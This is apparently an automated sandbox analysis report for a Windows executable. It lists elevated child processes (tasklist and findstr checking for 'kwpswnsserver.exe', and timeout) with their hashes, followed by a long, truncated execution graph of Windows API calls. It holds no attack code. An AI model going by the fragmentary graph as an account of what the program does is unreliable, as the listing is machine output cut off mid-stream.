                                                                MD5 hash:976566BEEFCCA4A159ECBDB2D4B1A3E3
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Has exited:true

                                                                General

                                                                Target ID:26
                                                                Start time:07:11:48
                                                                Start date:27/12/2024
                                                                Path:C:\Windows\SysWOW64\tasklist.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:tasklist /FI "IMAGENAME eq kwpswnsserver.exe"
                                                                Imagebase:0xc60000
                                                                File size:79'360 bytes
                                                                MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Has exited:true

                                                                General

                                                                Target ID:27
                                                                Start time:07:11:48
                                                                Start date:27/12/2024
                                                                Path:C:\Windows\SysWOW64\findstr.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:findstr /I "kwpswnsserver.exe"
                                                                Imagebase:0xb10000
                                                                File size:29'696 bytes
                                                                MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Has exited:true

                                                                General

                                                                Target ID:28
                                                                Start time:07:11:48
                                                                Start date:27/12/2024
                                                                Path:C:\Windows\SysWOW64\timeout.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:timeout /t 30 /nobreak
                                                                Imagebase:0xfb0000
                                                                File size:25'088 bytes
                                                                MD5 hash:976566BEEFCCA4A159ECBDB2D4B1A3E3
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Has exited:false

                                                                Disassembly

                                                                Reset < >

                                                                  Execution Graph

                                                                  Execution Coverage:17.9%
                                                                  Dynamic/Decrypted Code Coverage:0%
                                                                  Signature Coverage:26.8%
                                                                  Total number of Nodes:1428
                                                                  Total number of Limit Nodes:15
                                                                  execution_graph 9098 410e7f 9099 410e9a 9098->9099 9100 410eb5 9099->9100 9102 40f42d 9099->9102 9103 40f445 free 9102->9103 9104 40f437 9102->9104 9105 4024e7 46 API calls 9103->9105 9104->9103 9106 40f456 9104->9106 9105->9106 9106->9100 9087 40e63c 9088 40e5d3 6 API calls 9087->9088 9089 40e644 9088->9089 8241 4024c4 8242 40245a 45 API calls 8241->8242 8243 4024cd 8242->8243 8244 4024d2 8243->8244 8245 4024d3 VirtualAlloc 8243->8245 8246 4096c7 _EH_prolog 8260 4096fa 8246->8260 8247 40971c 8248 409827 8281 40118a 8248->8281 8250 409851 8255 40985e ??2@YAPAXI 8250->8255 8251 40983c 8332 409425 8251->8332 8252 4094e0 _CxxThrowException ??2@YAPAXI memcpy ??3@YAXPAX 8252->8260 8254 40969d 8 API calls 8254->8260 8256 409878 8255->8256 8261 409925 ??2@YAPAXI 8256->8261 8262 4098c2 8256->8262 8266 409530 3 API calls 8256->8266 8268 409425 ctype 3 API calls 8256->8268 8270 4099a2 8256->8270 8275 409a65 8256->8275 8291 409fb4 8256->8291 8295 408ea4 8256->8295 8338 409c13 ??2@YAPAXI 8256->8338 8340 409f49 8256->8340 8258 40e959 VirtualFree ??3@YAXPAX free free ctype 8258->8260 8260->8247 8260->8248 8260->8252 8260->8254 8260->8258 8325 4095b7 8260->8325 8329 409403 8260->8329 8261->8256 8335 409530 8262->8335 8266->8256 8268->8256 8271 409530 3 API calls 8270->8271 8272 4099c7 8271->8272 8273 409425 ctype 3 API calls 8272->8273 8273->8247 8277 409530 3 API calls 8275->8277 8278 409a84 8277->8278 8279 409425 ctype 3 API calls 8278->8279 8279->8247 8282 401198 GetDiskFreeSpaceExW 8281->8282 8283 4011ee SendMessageW 8281->8283 8282->8283 8284 4011b0 8282->8284 8289 4011d6 8283->8289 8284->8283 8285 401f9d 19 API calls 8284->8285 8286 4011c9 8285->8286 8287 407717 25 API calls 8286->8287 8288 4011cf 8287->8288 8288->8289 8290 4011e7 8288->8290 8289->8250 8289->8251 8290->8283 8292 409fdd 8291->8292 8344 409dff 8292->8344 8618 40aef3 8295->8618 8298 408ec1 8298->8256 8300 408fd5 8636 408b7c 8300->8636 8301 408f0d ??2@YAPAXI 8310 408ef5 8301->8310 8303 408f31 ??2@YAPAXI 8303->8310 8310->8300 8310->8301 8310->8303 8678 40cdb8 ??2@YAPAXI 8310->8678 8326 4095c6 8325->8326 8328 4095cc 8325->8328 8326->8260 8327 4095e2 _CxxThrowException 8327->8326 8328->8326 8328->8327 8330 40e8e2 4 API calls 8329->8330 8331 40940b 8330->8331 8331->8260 8333 40e8da ctype 3 API calls 8332->8333 8334 409433 8333->8334 8336 408963 ctype 3 API calls 8335->8336 8337 40953b 8336->8337 8339 409c45 8338->8339 8339->8256 8341 409f4e 8340->8341 8342 409f75 8341->8342 8343 409cde 110 API calls 8341->8343 8342->8256 8343->8341 8346 409e04 8344->8346 8345 409e3a 8345->8256 8346->8345 8348 409cde 8346->8348 8349 409cf8 8348->8349 8353 40db1f 8349->8353 8356 401626 8349->8356 8350 409d2c 8350->8346 8419 40da56 8353->8419 8357 401642 8356->8357 8363 401638 8356->8363 8427 40a62f _EH_prolog 8357->8427 8359 40166f 8495 40eca9 8359->8495 8360 401411 2 API calls 8362 401688 8360->8362 8364 401962 ??3@YAXPAX 8362->8364 8365 40169d 8362->8365 8363->8350 8369 40eca9 VariantClear 8364->8369 8453 401329 8365->8453 8368 4016a8 8457 401454 8368->8457 8369->8363 8372 401362 2 API calls 8373 4016c7 ??3@YAXPAX 8372->8373 8378 4016d9 8373->8378 8405 401928 ??3@YAXPAX 8373->8405 8375 40eca9 VariantClear 8375->8363 8376 4016fa 8377 40eca9 VariantClear 8376->8377 8379 401702 ??3@YAXPAX 8377->8379 8378->8376 8380 401764 8378->8380 8393 401725 8378->8393 8379->8359 8382 4017a2 8380->8382 8383 401789 8380->8383 8381 40eca9 VariantClear 8384 401737 ??3@YAXPAX 8381->8384 8386 4017c4 GetLocalTime SystemTimeToFileTime 8382->8386 8387 4017aa 8382->8387 8385 40eca9 VariantClear 8383->8385 8384->8359 8388 401791 ??3@YAXPAX 8385->8388 8386->8387 8389 4017e1 8387->8389 8390 4017f8 8387->8390 8387->8393 8388->8359 8462 403354 lstrlenW 8389->8462 8486 40301a GetFileAttributesW 8390->8486 8393->8381 8395 401934 GetLastError 8395->8405 8396 401818 ??2@YAPAXI 8398 401824 8396->8398 8397 40192a 8397->8395 8499 40db53 8398->8499 8401 40190f 8404 40eca9 VariantClear 8401->8404 8402 40185f GetLastError 8502 4012f7 8402->8502 8404->8405 8405->8375 8406 401871 8407 403354 86 API calls 8406->8407 8411 40187f ??3@YAXPAX 8406->8411 8409 4018cc 8407->8409 8409->8411 8412 40db53 2 API calls 8409->8412 8410 40189c 8413 40eca9 VariantClear 8410->8413 8411->8410 8414 4018f1 8412->8414 8415 4018aa ??3@YAXPAX 8413->8415 8416 4018f5 GetLastError 8414->8416 8417 401906 ??3@YAXPAX 8414->8417 8415->8359 8416->8411 8417->8401 8424 40d985 8419->8424 8422 40da65 CreateFileW 8423 40da8a 8422->8423 8423->8350 8425 40d98f CloseHandle 8424->8425 8426 40d99a 8424->8426 8425->8426 8426->8422 8426->8423 8428 40a738 8427->8428 8429 40a66a 8427->8429 8430 40a687 8428->8430 8431 40a73d 8428->8431 8429->8430 8432 40a704 8429->8432 8433 40a679 8429->8433 8440 40a6ad 8430->8440 8531 40a3b0 8430->8531 8434 40a6f2 8431->8434 8437 40a747 8431->8437 8438 40a699 8431->8438 8432->8440 8505 40e69c 8432->8505 8433->8434 8435 40a67e 8433->8435 8527 40ed34 8434->8527 8439 40a6b2 8435->8439 8444 40a684 8435->8444 8437->8434 8437->8439 8438->8440 8519 40ed59 8438->8519 8439->8440 8523 40ed79 8439->8523 8514 40ecae 8440->8514 8443 40a71a 8508 40eced 8443->8508 8444->8430 8444->8438 8450 40eca9 VariantClear 8452 40166b 8450->8452 8452->8359 8452->8360 8454 401340 8453->8454 8455 40112b 2 API calls 8454->8455 8456 40134b 8455->8456 8456->8368 8458 4012f7 2 API calls 8457->8458 8459 401462 8458->8459 8546 4013e2 8459->8546 8461 40146d 8461->8372 8463 4024fc 2 API calls 8462->8463 8464 403375 8463->8464 8465 40112b 2 API calls 8464->8465 8468 403385 8464->8468 8465->8468 8467 4033d3 GetSystemTimeAsFileTime GetFileAttributesW 8469 4033e8 8467->8469 8470 4033f2 8467->8470 8468->8467 8476 403477 8468->8476 8549 401986 CreateDirectoryW 8468->8549 8471 40301a 22 API calls 8469->8471 8472 401986 4 API calls 8470->8472 8483 4033f8 ??3@YAXPAX 8470->8483 8471->8470 8485 403405 8472->8485 8473 4034a7 8474 407776 55 API calls 8473->8474 8479 4034b1 ??3@YAXPAX 8474->8479 8475 40340a 8555 407776 8475->8555 8476->8473 8476->8483 8477 40346b ??3@YAXPAX 8482 4034bc 8477->8482 8478 40341d memcpy 8478->8485 8479->8482 8482->8393 8483->8482 8484 401986 4 API calls 8484->8485 8485->8475 8485->8477 8485->8478 8485->8484 8487 403037 8486->8487 8493 401804 8486->8493 8488 403048 8487->8488 8489 40303b SetLastError 8487->8489 8490 403051 8488->8490 8492 40305f FindFirstFileW 8488->8492 8488->8493 8489->8493 8574 402fed 8490->8574 8492->8490 8494 403072 FindClose CompareFileTime 8492->8494 8493->8395 8493->8396 8493->8397 8494->8490 8494->8493 8496 40ec65 8495->8496 8497 40ec86 VariantClear 8496->8497 8498 40ec9d 8496->8498 8497->8363 8498->8363 8615 40db3c 8499->8615 8503 40112b 2 API calls 8502->8503 8504 401311 8503->8504 8504->8406 8506 4012f7 2 API calls 8505->8506 8507 40e6a9 8506->8507 8507->8443 8535 40ecd7 8508->8535 8511 40ed12 8512 40a726 ??3@YAXPAX 8511->8512 8513 40ed17 _CxxThrowException 8511->8513 8512->8440 8513->8512 8538 40ec65 8514->8538 8516 40ecba 8517 40a7b2 8516->8517 8518 40ecbe memcpy 8516->8518 8517->8450 8518->8517 8520 40ed62 8519->8520 8521 40ed67 8519->8521 8522 40ecd7 VariantClear 8520->8522 8521->8440 8522->8521 8524 40ed82 8523->8524 8525 40ed87 8523->8525 8526 40ecd7 VariantClear 8524->8526 8525->8440 8526->8525 8528 40ed42 8527->8528 8529 40ed3d 8527->8529 8528->8440 8530 40ecd7 VariantClear 8529->8530 8530->8528 8532 40a3c2 8531->8532 8533 40a3de 8532->8533 8542 40eda0 8532->8542 8533->8440 8536 40eca9 VariantClear 8535->8536 8537 40ecdf SysAllocString 8536->8537 8537->8511 8537->8512 8539 40ec6d 8538->8539 8540 40ec86 VariantClear 8539->8540 8541 40ec9d 8539->8541 8540->8516 8541->8516 8543 40edae 8542->8543 8544 40eda9 8542->8544 8543->8533 8545 40ecd7 VariantClear 8544->8545 8545->8543 8547 401398 2 API calls 8546->8547 8548 4013f2 8547->8548 8548->8461 8550 4019c7 8549->8550 8551 401997 GetLastError 8549->8551 8550->8468 8552 4019b1 GetFileAttributesW 8551->8552 8554 4019a6 8551->8554 8552->8550 8552->8554 8553 4019a7 SetLastError 8553->8468 8554->8550 8554->8553 8556 401f9d 19 API calls 8555->8556 8557 40778a wvsprintfW 8556->8557 8558 407859 8557->8558 8559 4077ab GetLastError FormatMessageW 8557->8559 8562 4076a8 25 API calls 8558->8562 8560 4077d9 FormatMessageW 8559->8560 8561 4077ee lstrlenW lstrlenW ??2@YAPAXI lstrcpyW lstrcpyW 8559->8561 8560->8558 8560->8561 8566 4076a8 8561->8566 8564 407865 8562->8564 8564->8483 8567 407715 ??3@YAXPAX LocalFree 8566->8567 8568 4076b7 8566->8568 8567->8564 8569 40661a 2 API calls 8568->8569 8570 4076c6 IsWindow 8569->8570 8571 4076ef 8570->8571 8572 4076dd IsBadReadPtr 8570->8572 8573 4073d1 21 API calls 8571->8573 8572->8571 8573->8567 8580 402c86 8574->8580 8576 402ff6 8577 403017 8576->8577 8578 402ffb GetLastError 8576->8578 8577->8493 8579 403006 8578->8579 8579->8493 8581 402c93 GetFileAttributesW 8580->8581 8582 402c8f 8580->8582 8583 402ca4 8581->8583 8584 402ca9 8581->8584 8582->8576 8583->8576 8585 402cc7 8584->8585 8586 402cad SetFileAttributesW 8584->8586 8591 402b79 8585->8591 8588 402cc3 8586->8588 8589 402cba DeleteFileW 8586->8589 8588->8576 8589->8576 8592 4024fc 2 API calls 8591->8592 8593 402b90 8592->8593 8594 40254d 2 API calls 8593->8594 8595 402b9d FindFirstFileW 8594->8595 8596 402c55 SetFileAttributesW 8595->8596 8609 402bbf 8595->8609 8598 402c60 RemoveDirectoryW 8596->8598 8599 402c78 ??3@YAXPAX 8596->8599 8597 401329 2 API calls 8597->8609 8598->8599 8600 402c6d ??3@YAXPAX 8598->8600 8601 402c80 8599->8601 8600->8601 8601->8576 8603 40254d 2 API calls 8603->8609 8604 402c24 SetFileAttributesW 8604->8599 8606 402c2d DeleteFileW 8604->8606 8605 402bef lstrcmpW 8607 402c05 lstrcmpW 8605->8607 8608 402c38 FindNextFileW 8605->8608 8606->8609 8607->8608 8607->8609 8608->8609 8610 402c4e FindClose 8608->8610 8609->8597 8609->8599 8609->8603 8609->8604 8609->8605 8609->8608 8611 402b79 2 API calls 8609->8611 8612 401429 8609->8612 8610->8596 8611->8609 8613 401398 2 API calls 8612->8613 8614 401433 8613->8614 8614->8609 8616 40db1f 2 API calls 8615->8616 8617 401857 8616->8617 8617->8401 8617->8402 8619 40af0c 8618->8619 8634 408ebd 8618->8634 8619->8634 8711 40ac7a 8619->8711 8621 40af3f 8622 40ac7a 7 API calls 8621->8622 8623 40b0cb 8621->8623 8627 40af96 8622->8627 8625 40e959 ctype 4 API calls 8623->8625 8624 40afbd 8718 40e959 8624->8718 8625->8634 8627->8623 8627->8624 8628 40b043 8631 40e959 ctype 4 API calls 8628->8631 8629 408761 _CxxThrowException ??2@YAPAXI memcpy ??3@YAXPAX 8630 40afc6 8629->8630 8630->8628 8630->8629 8632 40b07f 8631->8632 8633 40e959 ctype 4 API calls 8632->8633 8633->8634 8634->8298 8635 4065ea InitializeCriticalSection 8634->8635 8635->8310 8730 4086f0 8636->8730 8679 40cdc7 8678->8679 8680 408761 4 API calls 8679->8680 8681 40cdde 8680->8681 8681->8310 8712 40e8da ctype 3 API calls 8711->8712 8713 40ac86 8712->8713 8722 40e811 8713->8722 8715 40aca2 8715->8621 8716 409403 4 API calls 8717 40ac90 8716->8717 8717->8715 8717->8716 8719 40e93b 8718->8719 8720 40e8da ctype 3 API calls 8719->8720 8721 40e943 ??3@YAXPAX 8720->8721 8721->8630 8723 40e8a5 8722->8723 8724 40e824 8722->8724 8723->8717 8725 40e833 _CxxThrowException 8724->8725 8726 40e863 ??2@YAPAXI 8724->8726 8727 40e895 ??3@YAXPAX 8724->8727 8725->8724 8726->8724 8728 40e879 memcpy 8726->8728 8727->8723 8728->8727 8731 40e8da ctype 3 API calls 8730->8731 8732 4086f8 8731->8732 8733 40e8da ctype 3 API calls 8732->8733 8734 408700 8733->8734 8735 40e8da ctype 3 API calls 8734->8735 8736 408708 8735->8736 9107 40dace 9110 40daac 9107->9110 9113 40da8f 9110->9113 9114 40da56 2 API calls 9113->9114 9115 40daa9 9114->9115 9090 40dadc ReadFile 9116 411def __set_app_type __p__fmode __p__commode 9117 411e5e 9116->9117 9118 411e72 9117->9118 9119 411e66 __setusermatherr 9117->9119 9128 411f66 _controlfp 9118->9128 9119->9118 9121 411e77 _initterm __getmainargs _initterm 9122 411ecb GetStartupInfoA 9121->9122 9124 411eff GetModuleHandleA 9122->9124 9129 4064af _EH_prolog 9124->9129 9128->9121 9132 404faa 9129->9132 9437 401b37 GetModuleHandleW CreateWindowExW 9132->9437 9135 404fdc 9136 40648e MessageBoxA 9135->9136 9138 404ff6 9135->9138 9137 4064a5 exit _XcptFilter 9136->9137 9139 401411 2 API calls 9138->9139 9140 40502d 9139->9140 9141 401411 2 API calls 9140->9141 9142 405035 9141->9142 9440 403e23 9142->9440 9147 40254d 2 API calls 9148 405073 9147->9148 9449 402a69 9148->9449 9150 40507c 9463 403d71 9150->9463 9154 40509b _wtol 9156 4050b1 9154->9156 9155 4050d6 9157 403d71 6 API calls 9155->9157 9468 404405 9156->9468 9158 4050e1 9157->9158 9159 4050e7 9158->9159 9160 405118 9158->9160 9625 404996 9159->9625 9161 405130 GetModuleFileNameW 9160->9161 9163 40112b 2 API calls 9160->9163 9164 405151 9161->9164 9165 405142 9161->9165 9163->9161 9170 403d71 6 API calls 9164->9170 9166 407776 55 API calls 9165->9166 9175 4050ec 9166->9175 9167 4050ee ??3@YAXPAX 9643 403e70 9167->9643 9169 4050ff ??3@YAXPAX ??3@YAXPAX 9169->9137 9183 405173 9170->9183 9171 4052d5 9172 401362 2 API calls 9171->9172 9173 4052e5 9172->9173 9174 401362 2 API calls 9173->9174 9178 4052f2 9174->9178 9175->9167 9176 4051fa 9176->9175 9177 40522a 9176->9177 9180 405213 _wtol 9176->9180 9181 403d71 6 API calls 9177->9181 9179 40538d ??2@YAPAXI 9178->9179 9182 401329 2 API calls 9178->9182 9189 405399 9179->9189 9180->9177 9187 405289 9181->9187 9184 405327 9182->9184 9183->9171 9183->9175 9183->9176 9183->9177 9186 401429 2 API calls 9183->9186 9185 401329 2 API calls 9184->9185 9191 40533d 9185->9191 9186->9183 9187->9171 9188 404594 2 API calls 9187->9188 9190 4052ba 9188->9190 9192 4053cf 9189->9192 9196 407776 55 API calls 9189->9196 9190->9171 9194 401362 2 API calls 9190->9194 9195 401362 2 API calls 9191->9195 9493 4025ae 9192->9493 9194->9171 9198 405367 9195->9198 9196->9192 9200 401f9d 19 API calls 9198->9200 9199 4025ae 2 API calls 9201 4053f6 9199->9201 9202 40536e 9200->9202 9203 4025ae 2 API calls 9201->9203 9204 40254d 2 API calls 9202->9204 9206 4053fe 9203->9206 9205 405377 9204->9205 9205->9179 9496 404e3f 9206->9496 9211 40546f 9212 405534 9211->9212 9215 403d71 6 API calls 9211->9215 9214 40e8da ctype 3 API calls 9212->9214 9213 402844 10 API calls 9216 405441 9213->9216 9217 40553c 9214->9217 9218 405493 9215->9218 9216->9211 9219 407776 55 API calls 9216->9219 9220 405573 9217->9220 9674 403093 9217->9674 9218->9212 9229 40549d 9218->9229 9221 405450 ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX 9219->9221 9223 405506 ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX 9220->9223 9224 40557c 9220->9224 9221->9211 9223->9167 9223->9175 9227 405588 wsprintfW 9224->9227 9228 4055ed 9224->9228 9235 401411 2 API calls 9224->9235 9237 401329 ??2@YAPAXI ??3@YAXPAX 9224->9237 9239 401f9d 19 API calls 9224->9239 9708 402f6c ??2@YAPAXI 9224->9708 9714 402425 ??3@YAXPAX ??3@YAXPAX 9224->9714 9226 405556 ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX 9230 4054f5 9226->9230 9231 401411 2 API calls 9227->9231 9524 404603 9228->9524 9229->9223 9648 404cbc 9229->9648 9230->9223 9231->9224 9234 4054cc 9234->9223 9236 407776 55 API calls 9234->9236 9235->9224 9238 4054da ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX 9236->9238 9237->9224 9238->9230 9239->9224 9240 40584a 9241 404603 26 API calls 9240->9241 9273 40586a 9241->9273 9245 405933 9586 404034 9245->9586 9246 4024fc 2 API calls 9246->9273 9250 4059d8 CoInitialize 9256 40243b lstrcmpW 9250->9256 9251 40595a 9254 40243b lstrcmpW 9251->9254 9252 405935 ??3@YAXPAX 9252->9245 9255 405969 9254->9255 9257 405979 9255->9257 9260 401f9d 19 API calls 9255->9260 9258 4059fe 9256->9258 9741 403b40 9257->9741 9261 405a12 9258->9261 9264 401329 2 API calls 9258->9264 9259 401411 ??2@YAPAXI ??3@YAXPAX 9259->9273 9260->9257 9592 403b59 9261->9592 9263 401362 2 API calls 9263->9273 9264->9261 9268 4073d1 21 API calls 9272 40599c ctype 9268->9272 9269 401329 2 API calls 9269->9273 9270 4055f6 9270->9240 9280 403b94 lstrlenW lstrlenW _wcsnicmp 9270->9280 9284 4057dd _wtol 9270->9284 9299 405878 ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX 9270->9299 9715 40484d 9270->9715 9726 40408b 9270->9726 9271 405a4d 9277 405a2b ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX 9271->9277 9313 405a61 9271->9313 9761 4082e9 9271->9761 9278 4059a7 ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX 9272->9278 9273->9245 9273->9246 9273->9252 9273->9259 9273->9263 9273->9269 9276 402f6c 7 API calls 9273->9276 9583 40243b 9273->9583 9740 402425 ??3@YAXPAX ??3@YAXPAX 9273->9740 9276->9273 9277->9271 9278->9175 9280->9270 9281 405910 ??3@YAXPAX 9281->9273 9282 401411 2 API calls 9282->9313 9284->9270 9285 405bd8 ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX 9306 405bf3 9285->9306 9286 405a9f GetKeyState 9286->9313 9287 405c6c 9290 405ca2 9287->9290 9291 405c74 9287->9291 9288 401329 ??2@YAPAXI ??3@YAXPAX 9288->9313 9289 40243b lstrcmpW 9289->9313 9294 4012f7 2 API calls 9290->9294 9803 403f85 9291->9803 9297 405cb0 9294->9297 9300 403b59 15 API calls 9297->9300 9298 401362 2 API calls 9304 405c91 ??3@YAXPAX 9298->9304 9299->9175 9302 405cb9 9300->9302 9301 407776 55 API calls 9303 405c13 ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX 9301->9303 9305 405cca ??3@YAXPAX 9302->9305 9309 401362 2 API calls 9302->9309 9303->9306 9310 405cd9 9304->9310 9305->9310 9306->9301 9307 405c4a ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX 9306->9307 9307->9306 9308 405bcd ??3@YAXPAX 9308->9313 9309->9305 9311 405d24 9310->9311 9312 405d16 9310->9312 9816 40786b 9311->9816 9599 404a44 9312->9599 9313->9282 9313->9285 9313->9286 9313->9287 9313->9288 9313->9289 9313->9306 9313->9307 9313->9308 9316 401429 ??2@YAPAXI ??3@YAXPAX 9313->9316 9788 407613 9313->9788 9797 407674 9313->9797 9316->9313 9317 405d20 9318 405d65 9317->9318 9822 403e0d 9317->9822 9319 404034 21 API calls 9318->9319 9321 405d77 9319->9321 9323 406373 9321->9323 9324 401411 2 API calls 9321->9324 9326 4063f7 ctype 9323->9326 9329 40243b lstrcmpW 9323->9329 9325 405d95 9324->9325 9369 405da8 9325->9369 9826 40453e 9325->9826 9328 40643a ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX 9326->9328 9334 40243b lstrcmpW 9326->9334 9330 406461 9328->9330 9331 406467 ??3@YAXPAX 9328->9331 9332 4063a4 9329->9332 9330->9331 9333 403e70 ctype 4 API calls 9331->9333 9332->9326 9853 403f48 9332->9853 9335 406478 ??3@YAXPAX ??3@YAXPAX 9333->9335 9337 406416 9334->9337 9335->9137 9336 401411 ??2@YAPAXI ??3@YAXPAX 9336->9369 9337->9328 9341 406423 9337->9341 9340 405dd8 9343 405de5 9340->9343 9344 4061fa ??3@YAXPAX ??3@YAXPAX 9340->9344 9346 4012f7 2 API calls 9341->9346 9342 4073d1 21 API calls 9347 4063e0 ??3@YAXPAX 9342->9347 9835 4043c6 9343->9835 9348 406312 9344->9348 9345 40243b lstrcmpW 9345->9369 9350 406432 9346->9350 9347->9326 9354 40636a ??3@YAXPAX 9348->9354 9355 404034 21 API calls 9348->9355 9858 404aff 9350->9858 9353 405e45 9357 401329 2 API calls 9353->9357 9354->9323 9359 406321 9355->9359 9360 405e4e 9357->9360 9358 4043c6 2 API calls 9361 405e0e 9358->9361 9843 4048ab 9359->9843 9365 403b7f 19 API calls 9360->9365 9366 401362 2 API calls 9361->9366 9363 40626b ??3@YAXPAX ??3@YAXPAX 9363->9348 9364 401329 2 API calls 9364->9369 9383 405e57 9365->9383 9367 405e1a ??3@YAXPAX ??3@YAXPAX GetFileAttributesW 9366->9367 9370 406211 9367->9370 9371 405e41 9367->9371 9368 40633a SetCurrentDirectoryW 9372 4048ab 4 API calls 9368->9372 9369->9336 9369->9340 9369->9345 9369->9353 9369->9363 9369->9364 9373 401429 2 API calls 9369->9373 9376 403e0d 16 API calls 9370->9376 9371->9353 9374 406362 9372->9374 9375 405ee5 ??3@YAXPAX ??3@YAXPAX 9373->9375 9377 403e0d 16 API calls 9374->9377 9375->9369 9378 406216 9376->9378 9377->9354 9379 407776 55 API calls 9378->9379 9380 40621f 7 API calls 9379->9380 9381 40625e 9380->9381 9381->9363 9382 403bce lstrlenW lstrlenW _wcsnicmp 9382->9383 9383->9382 9384 405f61 _wtol 9383->9384 9385 406025 9383->9385 9384->9383 9386 406080 9385->9386 9387 40602e 9385->9387 9388 401362 2 API calls 9386->9388 9389 406053 9387->9389 9390 406034 9387->9390 9391 40607e 9388->9391 9393 401329 2 API calls 9389->9393 9392 401329 2 API calls 9390->9392 9394 40254d 2 API calls 9391->9394 9395 40603f 9392->9395 9396 406051 9393->9396 9397 406092 9394->9397 9398 40254d 2 API calls 9395->9398 9399 40243b lstrcmpW 9396->9399 9400 401411 2 API calls 9397->9400 9401 406048 9398->9401 9402 406068 9399->9402 9403 40609a 9400->9403 9404 40254d 2 API calls 9401->9404 9402->9397 9406 40254d 2 API calls 9402->9406 9405 401411 2 API calls 9403->9405 9404->9396 9407 4060a2 memset 9405->9407 9406->9391 9408 4060e1 9407->9408 9409 404594 2 API calls 9408->9409 9410 4060fe 9409->9410 9411 401329 2 API calls 9410->9411 9412 406109 9411->9412 9413 403b7f 19 API calls 9412->9413 9414 406112 9413->9414 9415 4061b1 9414->9415 9619 4021ed 9414->9619 9417 4062ee ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX 9415->9417 9419 4061c5 ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX 9415->9419 9417->9348 9419->9344 9420 406150 9422 403b7f 19 API calls 9420->9422 9421 401429 2 API calls 9423 406147 9421->9423 9424 406168 ShellExecuteExW 9422->9424 9425 40254d 2 API calls 9423->9425 9427 406282 9424->9427 9428 40618c 9424->9428 9425->9420 9431 407776 55 API calls 9427->9431 9429 4061a0 CloseHandle 9428->9429 9430 406192 WaitForSingleObject 9428->9430 9840 402185 9429->9840 9430->9429 9433 40628c 9431->9433 9434 403e0d 16 API calls 9433->9434 9435 406291 9 API calls 9434->9435 9436 4062e1 9435->9436 9436->9417 9438 401b6c SetTimer GetMessageW DispatchMessageW KillTimer DestroyWindow 9437->9438 9439 401b9f GetVersionExW 9437->9439 9438->9439 9439->9135 9439->9136 9441 40112b 2 API calls 9440->9441 9442 403e38 GetCommandLineW 9441->9442 9443 404594 9442->9443 9444 4045ce 9443->9444 9446 4045a2 9443->9446 9445 4045c6 9444->9445 9448 401429 2 API calls 9444->9448 9445->9147 9446->9445 9447 401429 2 API calls 9446->9447 9447->9446 9448->9444 9450 401411 2 API calls 9449->9450 9458 402a79 9450->9458 9451 401362 2 API calls 9452 402b6c ??3@YAXPAX 9451->9452 9452->9150 9453 402b5f 9453->9451 9455 401411 2 API calls 9455->9458 9456 401429 ??2@YAPAXI ??3@YAXPAX 9456->9458 9458->9453 9458->9455 9458->9456 9459 401362 2 API calls 9458->9459 9897 4025c6 9458->9897 9900 40272e 9458->9900 9460 402ad9 ??3@YAXPAX 9459->9460 9461 4013e2 2 API calls 9460->9461 9462 402aee ??3@YAXPAX ??3@YAXPAX 9461->9462 9462->9458 9464 403d80 9463->9464 9465 403dbd 9464->9465 9466 403d9a lstrlenW lstrlenW 9464->9466 9465->9154 9465->9156 9911 401a85 9466->9911 9469 401f47 3 API calls 9468->9469 9470 404416 9469->9470 9471 401f9d 19 API calls 9470->9471 9472 40441d 9471->9472 9473 401f9d 19 API calls 9472->9473 9474 404429 9473->9474 9475 401f9d 19 API calls 9474->9475 9476 404435 9475->9476 9477 401f9d 19 API calls 9476->9477 9478 404441 9477->9478 9479 401f9d 19 API calls 9478->9479 9480 40444d 9479->9480 9481 401f9d 19 API calls 9480->9481 9482 404459 9481->9482 9483 401f9d 19 API calls 9482->9483 9484 404465 9483->9484 9485 404480 SHGetSpecialFolderPathW 9484->9485 9488 404533 #17 9484->9488 9489 401411 2 API calls 9484->9489 9490 401329 ??2@YAPAXI ??3@YAXPAX 9484->9490 9492 402f6c 7 API calls 9484->9492 9916 402425 ??3@YAXPAX ??3@YAXPAX 9484->9916 9485->9484 9486 40449a wsprintfW 9485->9486 9487 401411 2 API calls 9486->9487 9487->9484 9488->9155 9489->9484 9490->9484 9492->9484 9494 4022b0 2 API calls 9493->9494 9495 4025c2 9494->9495 9495->9199 9917 403e86 9496->9917 9498 404e56 9499 403e86 2 API calls 9498->9499 9500 404e65 9499->9500 9921 404343 9500->9921 9504 404e82 ??3@YAXPAX 9505 404343 3 API calls 9504->9505 9506 404e9d 9505->9506 9507 403ec1 2 API calls 9506->9507 9508 404ea8 ??3@YAXPAX wsprintfA 9507->9508 9937 403ef6 9508->9937 9510 404ed0 9511 403ef6 2 API calls 9510->9511 9512 404edb 9511->9512 9513 402844 9512->9513 9514 402851 9513->9514 9522 40dcfb 3 API calls 9514->9522 9515 402863 lstrlenA lstrlenA 9520 402890 9515->9520 9516 40296e 9516->9211 9516->9213 9517 40293b memmove 9517->9516 9517->9520 9518 4028db memcmp 9518->9516 9518->9520 9519 402918 memcmp 9519->9520 9520->9516 9520->9517 9520->9518 9520->9519 9523 40dcc7 GetLastError 9520->9523 9948 402640 9520->9948 9522->9515 9523->9520 9525 40243b lstrcmpW 9524->9525 9526 40461c 9525->9526 9527 40466c 9526->9527 9529 401329 2 API calls 